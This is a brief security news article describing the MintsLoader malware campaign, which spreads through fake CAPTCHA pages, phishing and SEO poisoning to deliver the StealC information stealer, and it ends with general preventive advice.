MintsLoader Malware Spreads via Fake CAPTCHA Pages

MintsLoader malware is being used in cyberattacks targeting businesses in the U.S. and Europe. A recent report reveals that hackers distribute MintsLoader through fake CAPTCHA pages and spam emails. The malware acts as a loader, delivering harmful payloads like StealC, an information stealer, and BOINC, an open-source computing tool.

Attackers trick victims into downloading MintsLoader through phishing emails. Clicking the link leads to a fake verification page, urging users to copy and paste a PowerShell script. This script downloads and runs MintsLoader, which then deletes itself to avoid detection. In other cases, a disguised JavaScript file triggers the infection.

Once active, MintsLoader contacts a command-and-control (C2) server. It downloads additional PowerShell scripts to evade detection and adapt to different security environments. The malware also uses a Domain Generation Algorithm (DGA) to create new C2 domains daily, making tracking difficult.

Eventually, MintsLoader installs StealC, an advanced information stealer available through malware-as-a-service (MaaS). It is designed to extract sensitive data while avoiding detection in certain countries. This campaign is part of a larger wave of malware threats, including the rebranded Astolfo Loader, which evolved from JinxLoader.

Another related campaign abuses search engine optimization (SEO) poisoning. Hackers manipulate search results to lure users into downloading malware from fake websites. Victims searching for contracts or agreements are redirected to compromised WordPress sites, where a malicious download is disguised as a legitimate file.

Preventive Measures

To stay safe, users should avoid clicking on suspicious links or pasting commands from unknown sources. Always verify CAPTCHA pages before following instructions. Businesses should implement security awareness training and use endpoint protection to detect malicious scripts. Regular updates and monitoring can help prevent infections.